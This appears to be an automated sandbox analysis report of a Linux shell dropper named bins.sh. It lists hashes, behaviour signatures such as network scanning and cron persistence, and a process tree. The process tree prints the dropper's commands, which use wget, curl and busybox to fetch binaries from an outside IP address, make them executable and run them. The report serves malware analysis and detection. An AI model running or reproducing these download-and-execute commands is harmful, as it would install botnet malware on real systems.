Analysis
-
max time kernel
150s -
max time network
161s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
05-11-2024 00:17
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
fe55ec7a9c108baee34e5028d3c61501
-
SHA1
d8562e2cd5ac2b22c50957fe20b097f823b606c5
-
SHA256
43dedff8578cec7e507ea89b05dbf354465c223f4acfbf5e5f9ec924aaab3778
-
SHA512
be865b5d30e3f7babfe7ccd76bbfb176735d9af836c85b7a2c310c53eea50432ceec104d8dd1265df82566f3140c83259958d630c4691f62d6e7962bf0abbd2a
-
SSDEEP
192:Oq/UtnXhFEQu38yuay8Qz3FnXhFEQKuay8QzPl/e:O9tnXnEQu38ycnXnEQ6R
Malware Config
Signatures
-
Contacts a large (2109) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodpid Process 688 chmod 721 chmod -
Executes dropped EXE 2 IoCs
Processes:
sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdvioc pid Process /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 689 sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv 722 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv -
Renames itself 1 IoCs
Processes:
zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdvpid Process 723 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.SnYS6C crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdvcrontabdescription ioc Process File opened for reading /proc/922/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/947/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1005/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1041/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/806/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/916/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1075/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/21/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1065/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/915/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/920/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/973/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/990/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/815/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/865/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/884/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/739/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/777/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/814/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/827/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1070/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/807/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/935/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/957/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/919/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/977/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1072/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/23/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/28/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/308/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/796/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/831/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/734/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/785/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/993/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1013/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1083/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1078/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1080/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/filesystems crontab File opened for reading /proc/212/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/945/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/961/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1012/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/931/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/998/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1027/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/4/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/22/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/830/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/832/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/890/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/29/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/737/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/941/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1042/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1074/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/756/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/767/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/929/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/976/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/985/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/955/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv File opened for reading /proc/1024/cmdline zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxwgetcurlbusyboxwgetcurldescription ioc Process File opened for modification /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 busybox File opened for modification /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv wget File opened for modification /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv curl File opened for modification /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv busybox File opened for modification /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 wget File opened for modification /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6 curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:654
-
/bin/rm/bin/rm bins.sh2⤵PID:656
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- Writes file to tmp directory
PID:658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:682
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- Writes file to tmp directory
PID:685
-
-
/bin/chmodchmod 777 sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6./sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY62⤵PID:692
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- Writes file to tmp directory
PID:694
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:704
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- Writes file to tmp directory
PID:716
-
-
/bin/chmodchmod 777 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- File and Directory Permissions Modification
PID:721
-
-
/tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv./zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:722 -
/bin/shsh -c "crontab -l"3⤵PID:724
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:726
-
-
-
/bin/shsh -c "crontab -"3⤵PID:729
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:731
-
-
-
-
/bin/rmrm zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv2⤵PID:740
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB2⤵PID:744
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
122KB
MD5cd3d4b9c643e5b473fb4d88ed05f0716
SHA164ee7a97418583d759eaea8000890cc3bae1b5f4
SHA2560cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
SHA512164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD5d473ab5777a87c7a4a36813c8f7027dd
SHA1cbc92c9362560e5320223cc713ace03856c8edeb
SHA256bd6f5c6facb9531faa96b5d4cbd7b7aaae57902b1574ff23461b465d8d42eb32
SHA51258f2c965977736eba61b9be6473c6ed85fecec83c10437eeaa5f5d462c9844fea8f065c2c894eb56411021e281910e9ec1774d9d1345a7c24ba072cbf8b3c7d4